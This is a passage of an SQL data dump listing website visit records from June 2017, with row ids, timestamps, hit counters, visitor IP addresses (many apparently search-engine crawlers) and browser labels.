6648875,1,0,1,0,'66.249.64.67',''),(118201,1496649384,1,1,0,0,'164.132.161.23','other'),(118202,1496649599,1,1,0,0,'164.132.161.83','other'),(118203,1496649714,1,1,0,0,'91.196.178.33','chrome'),(118204,1496649789,1,1,0,0,'91.209.11.236','other'),(118205,1496649820,1,1,0,0,'217.182.132.193','other'),(118206,1496650384,2,0,2,0,'66.249.64.14',''),(118207,1496650428,1,0,1,0,'66.249.64.13',''),(118208,1496650434,1,1,0,0,'51.255.71.123','other'),(118209,1496650807,1,1,0,0,'164.132.161.30','other'),(118210,1496650872,1,1,0,0,'51.255.65.14','other'),(118211,1496652491,1,1,0,0,'217.23.11.71','chrome'),(118212,1496653642,1,0,1,0,'66.249.64.73',''),(118213,1496653772,1,1,0,0,'92.113.127.0','opera'),(118214,1496653897,1,1,0,0,'37.204.84.26','msie'),(118215,1496653909,21,21,0,0,'5.9.88.103','other'),(118216,1496653956,1,1,0,0,'164.132.161.15','other'),(118217,1496654290,1,1,0,0,'217.23.11.71','chrome'),(118218,1496654292,1,0,1,0,'66.249.64.15',''),(118219,1496654942,1,1,0,0,'51.255.71.111','other'),(118220,1496655032,1,1,0,0,'51.255.65.38','other'),(118221,1496655581,1,1,0,0,'51.255.65.45','other'),(118222,1496655918,1,0,1,0,'66.249.64.14',''),(118223,1496656086,1,1,0,0,'66.249.64.15','chrome'),(118224,1496656128,1,1,0,0,'66.249.64.14','chrome'),(118225,1496656565,1,1,0,0,'51.255.65.38','other'),(118226,1496656964,1,1,0,0,'164.132.161.10','other'),(118227,1496657928,1,1,0,0,'217.182.132.88','other'),(118228,1496657976,1,1,0,0,'51.255.71.123','other'),(118229,1496658162,1,1,0,0,'164.132.161.3','other'),(118230,1496658185,1,1,0,0,'195.182.22.54','firefox'),(118231,1496658533,1,1,0,0,'217.182.132.6','other'),(118232,1496658891,1,1,0,0,'217.182.132.182','other'),(118233,1496658998,1,1,0,0,'217.182.132.185','other'),(118234,1496659424,1,1,0,0,'8.29.198.25','other'),(118235,1496660062,1,1,0,0,'164.132.162.160','other'),(118236,1496660597,1,1,0,0,'164.132.161.46','other'),(118237,1496660624,1,0,1,0,'68.180.230.48',''),(118238,1496661676,1,0,1,0,'66.249.64.13',''),(118239,1496661695,1,1,0,0,'217.182.132.71','other'),(118240,1496661972,1,1,0,0,'40.77.167.17','other'),(118241,1496662009,1,0,1,0,'66.249.64.14',''),(118242,1496662032,2,0,2,0,'68.180.230.48',''),(118243,1496662105,1,1,0,0,'51.255.65.36','other'),(118244,1496662291,1,1,0,0,'164.132.161.43','other'),(118245,1496662604,1,1,0,0,'51.255.65.23','other'),(118246,1496662621,1,1,0,0,'137.74.207.170','other'),(118247,1496662893,1,1,0,0,'217.182.132.60','other'),(118248,1496662945,1,1,0,0,'164.132.162.160','other'),(118249,1496662989,1,1,0,0,'51.255.65.3','other'),(118250,1496663134,1,1,0,0,'51.255.71.129','other'),(118251,1496663150,1,1,0,0,'164.132.161.28','other'),(118252,1496663307,1,0,1,0,'66.249.64.14',''),(118253,1496663566,1,0,1,0,'68.180.230.48',''),(118254,1496663602,1,1,0,0,'162.210.196.98','other'),(118255,1496663810,1,1,0,0,'51.255.65.97','other'),(118256,1496664442,1,1,0,0,'51.255.71.125','other'),(118257,1496664772,1,0,1,0,'66.249.64.15',''),(118258,1496665661,1,1,0,0,'40.77.167.17','other'),(118259,1496665736,1,0,1,0,'66.249.64.67',''),(118260,1496665945,1,0,1,0,'66.249.64.15',''),(118261,1496666112,2,1,1,0,'66.249.64.71',''),(118262,1496666711,1,0,1,0,'68.180.230.48',''),(118263,1496666975,1,0,1,0,'66.249.64.13',''),(118264,1496667254,14,14,0,0,'173.212.204.146','other'),(118265,1496667261,1,1,0,0,'217.182.132.86','other'),(118266,1496667380,1,1,0,0,'91.196.178.39','chrome'),(118267,1496667629,64,64,0,0,'64.140.169.42','firefox'),(118268,1496667665,1,1,0,0,'164.132.161.59','other'),(118269,1496667810,1,1,0,0,'164.132.161.92','other'),(118270,1496668072,1,1,0,0,'51.255.71.120','other'),(118271,1496668168,1,1,0,0,'51.255.65.18','other'),(118272,1496668231,1,1,0,0,'217.182.132.18','other'),(118273,1496668788,1,1,0,0,'217.182.132.178','other'),(118274,1496668806,1,1,0,0,'51.255.71.98','other'),(118275,1496669304,1,1,0,0,'51.255.65.13','other'),(118276,1496669358,1,1,0,0,'91.196.178.39','chrome'),(118277,1496669551,1,1,0,0,'217.182.132.84','other'),(118278,1496670258,1,1,0,0,'8.29.198.27','other'),(118279,1496670399,1,0,1,0,'66.249.64.14',''),(118280,1496670649,1,1,0,0,'180.76.15.28','other'),(118281,1496671178,1,1,0,0,'217.182.132.70','other'),(118282,1496671279,1,0,1,0,'66.249.64.67',''),(118283,1496671580,1,1,0,0,'91.209.11.236','other'),(118284,1496672039,1,0,1,0,'66.249.64.73',''),(118285,1496672395,1,0,1,0,'68.180.231.23',''),(118286,1496673312,1,1,0,0,'217.182.132.82','other'),(118287,1496673786,1,1,0,0,'217.182.132.24','other'),(118288,1496674762,1,1,0,0,'217.118.95.106','chrome'),(118289,1496674868,1,0,1,0,'66.249.66.157',''),(118290,1496674899,1,1,0,0,'180.76.15.160','other'),(118291,1496674946,1,0,1,0,'68.180.230.48',''),(118292,1496675025,1,1,0,0,'66.249.76.93','chrome'),(118293,1496675180,1,1,0,0,'164.132.161.29','other'),(118294,1496675364,1,1,0,0,'164.132.161.66','other'),(118295,1496675396,1,1,0,0,'193.194.127.28','chrome'),(118296,1496675704,1,1,0,0,'31.14.250.76','other'),(118297,1496676116,1,0,1,0,'66.249.76.89',''),(118298,1496676393,1,1,0,0,'51.255.65.78','other'),(118299,1496676403,1,1,0,0,'217.182.132.71','other'),(118300,1496676437,1,1,0,0,'164.132.161.24','other'),(118301,1496676455,1,1,0,0,'164.132.161.94','other'),(118302,1496676770,1,1,0,0,'178.95.244.222','firefox'),(118303,1496677395,1,0,1,0,'66.249.76.91',''),(118304,1496677966,1,1,0,0,'164.132.164.180','other'),(118305,1496678022,1,1,0,0,'164.132.161.79','other'),(118306,1496678026,4,4,0,0,'91.209.11.236','other'),(118307,1496678292,1,1,0,0,'157.55.39.175','other'),(118308,1496678355,1,1,0,0,'217.182.132.174','other'),(118309,1496678473,1,1,0,0,'217.182.132.177','other'),(118310,1496679375,1,1,0,0,'66.249.76.93','chrome'),(118311,1496679524,1,0,1,0,'66.249.76.107',''),(118312,1496679640,2,0,2,0,'68.180.230.48',''),(118313,1496679750,1,1,0,0,'164.132.161.42','other'),(118314,1496679756,1,0,1,0,'66.249.76.108',''),(118315,1496679786,1,1,0,0,'91.209.11.236','other'),(118316,1496680372,1,1,0,0,'217.182.132.185','other'),(118317,1496680733,1,1,0,0,'91.209.11.236','other'),(118318,1496681086,1,1,0,0,'8.29.198.25','other'),(118319,1496681262,1,1,0,0,'157.55.39.246','other'),(118320,1496681439,1,1,0,0,'141.8.142.164','other'),(118321,1496681818,1,0,1,0,'66.249.76.89',''),(118322,1496682256,1,1,0,0,'54.165.59.7','other'),(118323,1496682519,1,1,0,0,'40.77.167.17','other'),(118324,1496682855,1,1,0,0,'51.255.65.56','other'),(118325,1496684825,1,1,0,0,'93.175.236.127','chrome'),(118326,1496684968,1,0,1,0,'66.249.76.89',''),(118327,1496685272,1,1,0,0,'51.255.65.61','other'),(118328,1496685921,1,1,0,0,'141.8.142.15','other'),(118329,1496686026,2,2,0,0,'91.222.61.45','opera'),(118330,1496686035,1,1,0,0,'51.255.71.113','other'),(118331,1496686219,1,1,0,0,'111.206.36.8','firefox'),(118332,1496686267,1,1,0,0,'51.255.71.118','other'),(118333,1496686764,1,1,0,0,'217.182.132.6','other'),(118334,1496686779,1,0,1,0,'68.180.230.48',''),(118335,1496687103,1,0,1,0,'66.249.76.91',''),(118336,1496687251,2,2,0,0,'91.209.11.236','other'),(118337,1496687595,1,1,0,0,'137.74.207.108','other'),(118338,1496687740,1,1,0,0,'185.182.81.132','chrome'),(118339,1496687849,1,1,0,0,'217.182.132.180','other'),(118340,1496688004,1,1,0,0,'217.182.132.182','other'),(118341,1496688400,1,0,1,0,'68.180.230.48',''),(118342,1496688478,1,0,1,0,'66.249.76.89',''),(118343,1496688523,1,0,1,0,'66.249.76.93',''),(118344,1496688552,1,0,1,0,'66.249.66.156',''),(118345,1496688576,1,0,1,0,'66.249.76.91',''),(118346,1496688962,1,1,0,0,'87.250.224.7','other'),(118347,1496689199,1,1,0,0,'51.255.65.30','other'),(118348,1496689484,2,2,0,0,'91.209.11.236','other'),(118349,1496689519,1,0,1,0,'68.180.230.48',''),(118350,1496689780,1,1,0,0,'164.132.161.80','other'),(118351,1496690035,1,1,0,0,'217.182.132.69','other'),(118352,1496690716,1,1,0,0,'51.255.65.11','other'),(118353,1496690808,1,1,0,0,'91.209.11.236','other'),(118354,1496691501,1,1,0,0,'51.255.65.29','other'),(118355,1496691521,2,2,0,0,'54.165.59.7','other'),(118356,1496691723,1,0,1,0,'66.249.66.156',''),(118357,1496691935,1,1,0,0,'8.29.198.27','other'),(118358,1496692180,1,1,0,0,'51.255.65.86','other'),(118359,1496692289,1,1,0,0,'51.255.71.121','other'),(118360,1496692381,1,0,1,0,'66.249.76.109',''),(118361,1496692840,1,1,0,0,'130.180.211.200','chrome'),(118362,1496692855,1,1,0,0,'51.255.71.115','other'),(118363,1496693226,1,1,0,0,'217.182.132.180','other'),(118364,1496693509,1,0,1,0,'66.249.76.108',''),(118365,1496693945,1,1,0,0,'51.255.65.56','other'),(118366,1496694620,1,1,0,0,'217.182.132.152','other'),(118367,1496694738,1,1,0,0,'185.182.81.13','chrome'),(118368,1496694741,2,2,0,0,'95.108.179.15','other'),(118369,1496694757,2,2,0,0,'141.8.142.164','other'),(118370,1496694860,1,1,0,0,'87.250.224.7','other'),(118371,1496695298,4,4,0,0,'141.8.142.15','other'),(118372,1496695391,1,1,0,0,'5.255.253.63','other'),(118373,1496695438,1,0,1,0,'66.249.76.109',''),(118374,1496695704,1,1,0,0,'217.182.132.186','other'),(118375,1496695896,1,1,0,0,'66.249.66.195','chrome'),(118376,1496695904,1,0,1,0,'66.249.76.93',''),(118377,1496695907,1,1,0,0,'95.108.213.34','other'),(118378,1496697703,1,1,0,0,'91.209.11.236','other'),(118379,1496697958,1,1,0,0,'51.255.64.106','other'),(118380,1496698220,1,1,0,0,'137.74.207.161','other'),(118381,1496698490,1,1,0,0,'164.132.161.81','other'),(118382,1496698602,1,1,0,0,'91.124.238.176','chrome'),(118383,1496698952,1,1,0,0,'51.255.65.62','other'),(118384,1496699493,1,1,0,0,'164.132.161.37','other'),(118385,1496699718,1,1,0,0,'217.182.132.50','other'),(118386,1496700701,1,1,0,0,'51.255.65.43','other'),(118387,1496700870,1,1,0,0,'164.132.161.36','other'),(118388,1496700924,1,1,0,0,'164.132.161.5','other'),(118389,1496701047,2,0,2,0,'66.249.76.89',''),(118390,1496701298,1,1,0,0,'51.255.65.67','other'),(118391,1496701792,1,1,0,0,'164.132.161.29','other'),(118392,1496701933,1,1,0,0,'217.182.132.183','other'),(118393,1496701968,1,1,0,0,'51.255.65.35','other'),(118394,1496701984,1,1,0,0,'164.132.161.77','other'),(118395,1496702010,1,1,0,0,'217.182.132.152','other'),(118396,1496702038,1,1,0,0,'217.182.132.87','other'),(118397,1496702058,1,1,0,0,'164.132.161.16','other'),(118398,1496702519,1,1,0,0,'164.132.161.52','other'),(118399,1496702644,1,0,1,0,'68.180.230.48',''),(118400,1496702682,1,0,1,0,'66.249.76.93',''),(118401,1496702689,1,0,1,0,'66.249.76.89',''),(118402,1496702763,1,1,0,0,'8.29.198.25','other'),(118403,1496702819,1,1,0,0,'180.76.15.14','other'),(118404,1496703597,1,1,0,0,'51.255.65.20','other'),(118405,1496703867,1,1,0,0,'164.132.161.18','other'),(118406,1496703988,1,1,0,0,'40.77.167.26','other'),(118407,1496704243,1,1,0,0,'217.182.132.37','other'),(118408,1496704309,1,1,0,0,'164.132.164.180','other'),(118409,1496704744,1,1,0,0,'107.178.194.60','msie'),(118410,1496704745,1,1,0,0,'204.13.201.137','msie'),(118411,1496704760,1,1,0,0,'51.255.65.93','other'),(118412,1496704789,1,1,0,0,'164.132.161.61','other'),(118413,1496705049,2,2,0,0,'51.15.54.85','firefox'),(118414,1496705054,2,2,0,0,'51.15.54.85','msie'),(118415,1496705074,1,1,0,0,'45.55.224.77','msie'),(118416,1496705228,1,1,0,0,'51.255.65.26','other'),(118417,1496705959,1,1,0,0,'51.15.54.85','msie'),(118418,1496705996,1,1,0,0,'217.182.132.57','other'),(118419,1496706041,1,1,0,0,'164.132.161.26','other'),(118420,1496706118,1,1,0,0,'51.15.54.85','other'),(118421,1496706861,2,2,0,0,'51.15.54.85','msie'),(118422,1496706964,1,1,0,0,'150.70.173.7','msie'),(118423,1496707332,1,1,0,0,'51.255.65.24','other'),(118424,1496707651,1,1,0,0,'51.255.65.48','other'),(118425,1496707823,1,0,1,0,'68.180.230.48',''),(118426,1496709196,1,1,0,0,'180.76.15.15','other'),(118427,1496709345,1,1,0,0,'14.134.60.55','chrome'),(118428,1496709921,1,1,0,0,'66.249.76.109','chrome'),(118429,1496710254,1,1,0,0,'51.255.64.106','other'),(118430,1496710918,1,1,0,0,'51.255.71.118','other'),(118431,1496711669,1,1,0,0,'51.255.65.45','other'),(118432,1496711772,1,1,0,0,'51.255.65.78','other'),(118433,1496711780,1,1,0,0,'51.255.65.84','other'),(118434,1496712561,1,1,0,0,'217.182.132.181','other'),(118435,1496712730,1,1,0,0,'83.149.126.98','other'),(118436,1496713061,1,1,0,0,'51.255.65.91','other'),(118437,1496713081,1,1,0,0,'164.132.161.49','other'),(118438,1496713121,1,1,0,0,'217.182.132.84','other'),(118439,1496713313,1,1,0,0,'164.132.161.77','other'),(118440,1496713357,1,1,0,0,'164.132.161.45','other'),(118441,1496713369,1,0,1,0,'68.180.230.48',''),(118442,1496713598,1,1,0,0,'8.29.198.25','other'),(118443,1496713615,1,1,0,0,'51.255.71.129','other'),(118444,1496713746,1,1,0,0,'51.255.65.16','other'),(118445,1496714134,1,1,0,0,'51.255.65.2','other'),(118446,1496714255,1,1,0,0,'141.8.142.164','other'),(118447,1496714294,1,1,0,0,'95.108.179.15','other'),(118448,1496714320,1,1,0,0,'5.255.253.63','other'),(118449,1496714448,1,0,1,0,'66.249.76.107',''),(118450,1496714612,1,0,1,0,'68.180.230.48',''),(118451,1496714637,1,1,0,0,'217.182.132.25','other'),(118452,1496715372,1,0,1,0,'66.249.76.109',''),(118453,1496715751,1,0,1,0,'66.249.66.157',''),(118454,1496715797,1,0,1,0,'66.249.76.89',''),(118455,1496715998,1,1,0,0,'40.77.167.126','other'),(118456,1496716101,1,1,0,0,'164.132.161.39','other'),(118457,1496716189,1,1,0,0,'164.132.161.2','other'),(118458,1496716943,1,1,0,0,'51.255.65.53','other'),(118459,1496716990,3,3,0,0,'46.229.168.65','other'),(118460,1496717007,2,2,0,0,'46.229.168.73','other'),(118461,1496717024,3,3,0,0,'46.229.168.69','other'),(118462,1496717039,8,8,0,0,'46.229.168.72','other'),(118463,1496717046,1,1,0,0,'66.249.76.89','chrome'),(118464,1496717066,2,2,0,0,'46.229.168.71','other'),(118465,1496717067,2,2,0,0,'46.229.168.74','other'),(118466,1496717103,2,2,0,0,'46.229.168.68','other'),(118467,1496717130,3,3,0,0,'46.229.168.75','other'),(118468,1496717171,4,4,0,0,'46.229.168.67','other'),(118469,1496717232,3,3,0,0,'46.229.168.66','other'),(118470,1496717320,1,0,1,0,'66.249.76.109',''),(118471,1496717894,1,1,0,0,'87.250.224.8','other'),(118472,1496717935,1,1,0,0,'141.8.142.164','other'),(118473,1496717968,1,1,0,0,'141.8.132.25','other'),(118474,1496717991,1,1,0,0,'141.8.142.154','other'),(118475,1496718020,1,1,0,0,'141.8.142.15','other'),(118476,1496718042,1,1,0,0,'95.108.213.34','other'),(118477,1496718339,1,0,1,0,'68.180.230.48',''),(118478,1496718806,1,1,0,0,'217.182.132.15','other'),(118479,1496718983,1,1,0,0,'66.249.76.93','chrome'),(118480,1496718999,1,1,0,0,'217.182.132.78','other'),(118481,1496719005,1,1,0,0,'217.182.132.181','other'),(118482,1496719008,2,2,0,0,'141.8.142.15','other'),(118483,1496719640,1,1,0,0,'217.182.132.74','other'),(118484,1496719725,2,2,0,0,'95.108.213.34','other'),(118485,1496719738,2,2,0,0,'5.255.253.63','other'),(118486,1496719753,3,3,0,0,'141.8.142.154','other'),(118487,1496719769,1,1,0,0,'95.108.213.7','other'),(118488,1496719773,1,1,0,0,'178.154.200.37','other'),(118489,1496719784,1,1,0,0,'5.255.253.83','other'),(118490,1496719788,1,1,0,0,'5.255.253.70','other'),(118491,1496719945,1,1,0,0,'217.182.132.71','other'),(118492,1496719963,2,2,0,0,'141.8.142.15','other'),(118493,1496719986,1,1,0,0,'178.154.149.3','other'),(118494,1496720051,1,0,1,0,'66.249.76.91',''),(118495,1496720146,1,0,1,0,'66.249.66.157',''),(118496,1496720288,1,0,1,0,'66.249.76.89',''),(118497,1496720507,1,1,0,0,'51.255.65.66','other'),(118498,1496720709,1,1,0,0,'51.255.65.41','other'),(118499,1496720731,1,1,0,0,'66.249.76.109','chrome'),(118500,1496720783,1,1,0,0,'217.182.132.178','other'),(118501,1496720920,1,1,0,0,'164.132.161.42','other'),(118502,1496720943,1,1,0,0,'217.182.132.17','other'),(118503,1496721405,1,1,0,0,'51.255.65.23','other'),(118504,1496721740,1,1,0,0,'217.182.132.7','other'),(118505,1496721788,1,1,0,0,'164.132.161.70','other'),(118506,1496722144,1,1,0,0,'51.255.65.33','other'),(118507,1496723013,1,1,0,0,'137.74.207.159','other'),(118508,1496723339,1,1,0,0,'217.182.132.27','other'),(118509,1496724046,1,1,0,0,'164.132.161.6','other'),(118510,1496724077,1,1,0,0,'51.255.71.117','other'),(118511,1496724159,1,1,0,0,'51.255.71.131','other'),(118512,1496724219,1,1,0,0,'51.255.65.52','other'),(118513,1496724407,1,1,0,0,'51.255.65.86','other'),(118514,1496724439,1,1,0,0,'8.29.198.26','other'),(118515,1496725021,1,1,0,0,'164.132.161.76','other'),(118516,1496725111,1,1,0,0,'51.255.65.14','other'),(118517,1496725650,1,1,0,0,'51.255.71.131','other'),(118518,1496725869,1,1,0,0,'91.196.178.33','chrome'),(118519,1496727298,2,2,0,0,'95.108.213.34','other'),(118520,1496727394,2,2,0,0,'141.8.142.15','other'),(118521,1496727468,3,3,0,0,'141.8.142.154','other'),(118522,1496727527,1,1,0,0,'141.8.142.164','other'),(118523,1496727565,1,1,0,0,'217.182.132.192','other'),(118524,1496727640,1,1,0,0,'141.8.132.25','other'),(118525,1496727740,1,1,0,0,'141.8.142.42','other'),(118526,1496727791,1,1,0,0,'141.8.142.38','other'),(118527,1496727928,1,1,0,0,'178.154.149.1','other'),(118528,1496727966,2,2,0,0,'91.196.178.71','chrome'),(118529,1496727977,1,1,0,0,'87.250.224.8','other'),(118530,1496728037,1,1,0,0,'87.250.224.16','other'),(118531,1496728082,2,2,0,0,'178.154.200.37','other'),(118532,1496728204,5,5,0,0,'95.108.213.34','other'),(118533,1496728247,1,1,0,0,'87.250.224.18','other'),(118534,1496728306,6,6,0,0,'95.108.179.15','other'),(118535,1496728374,1,1,0,0,'178.154.149.3','other'),(118536,1496728398,1,1,0,0,'193.164.95.197','other'),(118537,1496728428,1,1,0,0,'51.255.65.27','other'),(118538,1496728468,2,2,0,0,'141.8.142.15','other'),(118539,1496728592,1,1,0,0,'141.8.142.154','other'),(118540,1496728678,2,2,0,0,'87.250.224.7','other'),(118541,1496728985,1,1,0,0,'51.255.65.75','other'),(118542,1496729254,1,1,0,0,'91.196.177.46','chrome'),(118543,1496729256,1,1,0,0,'46.133.83.210','chrome'),(118544,1496729447,1,1,0,0,'91.196.178.71','chrome'),(118545,1496729471,1,1,0,0,'217.182.132.147','other'),(118546,1496730292,1,0,1,0,'66.249.76.89',''),(118547,1496730507,1,0,1,0,'66.249.66.157',''),(118548,1496730702,2,2,0,0,'66.249.76.107','chrome'),(118549,1496730939,1,1,0,0,'51.255.65.60','other'),(118550,1496731645,1,1,0,0,'164.132.161.54','other'),(118551,1496731716,1,1,0,0,'217.182.132.87','other'),(118552,1496731789,1,1,0,0,'217.182.132.174','other'),(118553,1496732158,1,1,0,0,'83.31.198.176','msie'),(118554,1496732159,1,1,0,0,'83.31.198.176','other'),(118555,1496732248,39,39,0,0,'51.255.203.77','other'),(118556,1496732606,1,1,0,0,'46.165.197.141','other'),(118557,1496732615,1,1,0,0,'164.132.161.7','other'),(118558,1496732797,6,6,0,0,'141.8.142.154','other'),(118559,1496732836,1,1,0,0,'5.255.253.63','other'),(118560,1496732874,1,1,0,0,'95.132.9.159','firefox'),(118561,1496732891,2,2,0,0,'95.108.213.34','other'),(118562,1496732909,4,4,0,0,'141.8.142.15','other'),(118563,1496732924,3,3,0,0,'95.108.179.15','other'),(118564,1496732951,4,4,0,0,'141.8.142.164','other'),(118565,1496732966,3,3,0,0,'87.250.224.7','other'),(118566,1496733118,1,1,0,0,'217.182.132.32','other'),(118567,1496733329,1,1,0,0,'164.132.161.46','other'),(118568,1496733603,1,1,0,0,'51.255.65.43','other'),(118569,1496733619,1,1,0,0,'217.182.132.57','other'),(118570,1496734279,1,1,0,0,'51.255.65.4','other'),(118571,1496734963,1,1,0,0,'217.182.132.86','other'),(118572,1496735130,1,1,0,0,'217.182.132.151','other'),(118573,1496735136,1,0,1,0,'66.249.76.91',''),(118574,1496735158,1,1,0,0,'51.255.65.2','other'),(118575,1496735329,1,1,0,0,'207.46.13.112','other'),(118576,1496735336,1,1,0,0,'137.74.207.102','other'),(118577,1496735623,1,1,0,0,'8.29.198.26','other'),(118578,1496735678,1,1,0,0,'91.196.178.39','chrome'),(118579,1496735749,1,1,0,0,'51.255.65.28','other'),(118580,1496735893,1,0,1,0,'66.249.76.89',''),(118581,1496735982,1,1,0,0,'51.255.65.22','other'),(118582,1496736780,1,0,1,0,'66.249.66.195',''),(118583,1496736954,1,1,0,0,'95.108.179.15','other'),(118584,1496737063,1,1,0,0,'95.108.213.34','other'),(118585,1496737355,1,1,0,0,'51.255.65.24','other'),(118586,1496737433,1,1,0,0,'164.132.161.65','other'),(118587,1496737460,1,1,0,0,'176.31.231.10','other'),(118588,1496737543,1,1,0,0,'217.182.132.70','other'),(118589,1496737602,1,1,0,0,'193.164.95.197','other'),(118590,1496737630,1,1,0,0,'137.74.207.110','other'),(118591,1496737909,1,0,1,0,'66.249.76.89',''),(118592,1496737981,1,1,0,0,'51.255.65.31','other'),(118593,1496737991,5,5,0,0,'141.8.142.15','other'),(118594,1496738043,4,4,0,0,'87.250.224.7','other'),(118595,1496738525,1,1,0,0,'217.182.132.28','other'),(118596,1496738543,1,1,0,0,'51.255.65.50','other'),(118597,1496738890,1,1,0,0,'217.182.132.58','other'),(118598,1496739590,2,0,2,0,'68.180.230.48',''),(118599,1496739746,1,1,0,0,'51.255.71.130','other'),(118600,1496739900,1,1,0,0,'51.255.65.54','other'),(118601,1496740110,1,1,0,0,'91.196.178.166','chrome'),(118602,1496740282,2,2,0,0,'95.108.179.15','other'),(118603,1496740427,1,1,0,0,'164.132.161.27','other'),(118604,1496740511,1,1,0,0,'178.154.200.37','other'),(118605,1496740523,1,1,0,0,'5.255.253.63','other'),(118606,1496740525,1,1,0,0,'95.108.213.8','other'),(118607,1496740955,1,1,0,0,'217.182.132.28','other'),(118608,1496740966,1,1,0,0,'157.55.39.151','other'),(118609,1496741176,2,2,0,0,'87.250.224.7','other'),(118610,1496741178,2,2,0,0,'141.8.142.164','other'),(118611,1496741180,1,1,0,0,'141.8.142.154','other'),(118612,1496741196,3,3,0,0,'95.108.213.34','other'),(118613,1496741223,1,1,0,0,'51.255.65.73','other'),(118614,1496741239,1,0,1,0,'66.249.76.89',''),(118615,1496741264,1,1,0,0,'164.132.161.56','other'),(118616,1496741335,1,0,1,0,'68.180.230.48',''),(118617,1496741428,1,1,0,0,'164.132.161.72','other'),(118618,1496741431,2,2,0,0,'95.108.179.15','other'),(118619,1496741463,1,1,0,0,'137.74.207.110','other'),(118620,1496741505,1,0,1,0,'66.249.76.93',''),(118621,1496741513,1,0,1,0,'66.249.76.91',''),(118622,1496741641,1,1,0,0,'5.53.118.14','chrome'),(118623,1496742424,1,1,0,0,'164.132.161.84','other'),(118624,1496742457,1,1,0,0,'95.108.213.34','other'),(118625,1496743294,1,1,0,0,'51.255.65.71','other'),(118626,1496743592,1,0,1,0,'68.180.230.48',''),(118627,1496743629,4,4,0,0,'95.108.213.34','other'),(118628,1496743665,2,2,0,0,'141.8.142.154','other'),(118629,1496743690,4,4,0,0,'87.250.224.7','other'),(118630,1496743740,3,3,0,0,'141.8.142.164','other'),(118631,1496743750,4,4,0,0,'141.8.142.15','other'),(118632,1496743769,1,1,0,0,'141.8.142.38','other'),(118633,1496743781,1,1,0,0,'37.9.113.43','other'),(118634,1496743790,1,1,0,0,'95.108.213.7','other'),(118635,1496743803,1,1,0,0,'93.158.152.79','other'),(118636,1496743830,1,1,0,0,'95.108.179.15','other'),(118637,1496743853,1,1,0,0,'95.108.181.13','other'),(118638,1496745398,1,1,0,0,'176.241.106.190','chrome'),(118639,1496745873,1,1,0,0,'141.8.142.154','other'),(118640,1496746183,4,4,0,0,'95.108.213.34','other'),(118641,1496746212,1,1,0,0,'141.8.142.164','other'),(118642,1496746273,2,2,0,0,'95.108.179.15','other'),(118643,1496746307,1,1,0,0,'188.166.85.194','chrome'),(118644,1496746312,1,1,0,0,'87.250.224.7','other'),(118645,1496746451,1,1,0,0,'164.132.161.38','other'),(118646,1496746552,1,1,0,0,'8.29.198.25','other'),(118647,1496747158,1,1,0,0,'31.202.12.20','chrome'),(118648,1496747237,1,1,0,0,'51.255.71.132','other'),(118649,1496747694,1,1,0,0,'164.132.161.36','other'),(118650,1496747707,1,1,0,0,'178.95.245.193','chrome'),(118651,1496747709,1,1,0,0,'217.182.132.61','other'),(118652,1496747820,1,1,0,0,'164.132.161.34','other'),(118653,1496749152,1,1,0,0,'157.55.39.151','other'),(118654,1496749670,1,1,0,0,'91.196.178.35','chrome'),(118655,1496749745,1,1,0,0,'91.196.177.46','firefox'),(118656,1496749772,1,1,0,0,'217.182.132.59','other'),(118657,1496750093,1,1,0,0,'157.55.39.151','other'),(118658,1496750186,1,1,0,0,'51.255.65.44','other'),(118659,1496750211,1,1,0,0,'37.54.18.1','firefox'),(118660,1496750221,1,1,0,0,'51.255.65.83','other'),(118661,1496750861,1,1,0,0,'178.62.128.67','firefox'),(118662,1496750982,1,1,0,0,'164.132.161.48','other'),(118663,1496751150,1,1,0,0,'141.8.142.15','other'),(118664,1496751848,1,1,0,0,'95.108.213.7','other'),(118665,1496751891,3,3,0,0,'141.8.142.154','other'),(118666,1496751936,5,5,0,0,'95.108.179.15','other'),(118667,1496752078,3,3,0,0,'141.8.142.15','other'),(118668,1496752105,2,2,0,0,'95.108.213.34','other'),(118669,1496752205,1,1,0,0,'87.250.224.18','other'),(118670,1496752242,1,1,0,0,'87.250.224.7','other'),(118671,1496752284,1,1,0,0,'178.95.215.57','chrome'),(118672,1496752682,2,2,0,0,'178.251.107.255','chrome'),(118673,1496752976,1,1,0,0,'51.255.65.52','other'),(118674,1496753089,1,1,0,0,'78.46.208.244','firefox'),(118675,1496753548,1,1,0,0,'51.255.65.56','other'),(118676,1496753636,1,1,0,0,'91.196.177.15','chrome'),(118677,1496753735,1,1,0,0,'141.8.142.154','other'),(118678,1496753784,1,1,0,0,'141.8.142.38','other'),(118679,1496754205,1,1,0,0,'217.182.132.153','other'),(118680,1496754263,1,0,1,0,'66.249.66.156',''),(118681,1496754627,1,1,0,0,'217.182.132.92','other'),(118682,1496754674,2,2,0,0,'78.46.208.244','firefox'),(118683,1496754676,1,1,0,0,'217.182.132.21','other'),(118684,1496754736,1,1,0,0,'217.182.132.193','other'),(118685,1496754763,1,0,1,0,'66.249.76.91',''),(118686,1496755078,1,1,0,0,'194.50.254.168','firefox'),(118687,1496755462,1,1,0,0,'180.76.15.18','other'),(118688,1496755624,1,1,0,0,'51.255.65.78','other'),(118689,1496755678,1,1,0,0,'51.255.65.4','other'),(118690,1496755813,1,1,0,0,'217.182.132.81','other'),(118691,1496755939,1,1,0,0,'164.132.164.180','other'),(118692,1496756166,1,1,0,0,'178.95.28.120','chrome'),(118693,1496756196,1,1,0,0,'87.250.224.8','other'),(118694,1496756216,1,1,0,0,'141.8.142.38','other'),(118695,1496756235,1,1,0,0,'87.250.224.18','other'),(118696,1496756242,7,7,0,0,'46.4.32.75','other'),(118697,1496756492,1,1,0,0,'78.46.208.244','firefox'),(118698,1496756595,1,1,0,0,'217.182.132.83','other'),(118699,1496756799,1,1,0,0,'217.182.132.30','other'),(118700,1496756920,1,1,0,0,'193.93.187.181','chrome'),(118701,1496757149,1,0,1,0,'68.180.230.48',''),(118702,1496757183,1,1,0,0,'92.112.109.230','chrome'),(118703,1496757290,1,1,0,0,'217.182.132.191','other'),(118704,1496757315,1,1,0,0,'164.132.161.47','other'),(118705,1496757375,1,1,0,0,'91.196.178.166','chrome'),(118706,1496757400,1,1,0,0,'8.29.198.26','other'),(118707,1496757493,1,1,0,0,'217.182.132.170','other'),(118708,1496757666,1,1,0,0,'66.249.76.89','chrome'),(118709,1496757786,1,1,0,0,'164.132.161.53','other'),(118710,1496757835,1,1,0,0,'94.179.24.250','chrome'),(118711,1496757912,2,2,0,0,'95.108.179.15','other'),(118713,1496757933,1,0,1,0,'66.249.66.195',''),(118714,1496758021,1,1,0,0,'95.108.213.34','other'),(118715,1496758030,1,1,0,0,'51.255.65.41','other'),(118716,1496758060,1,1,0,0,'178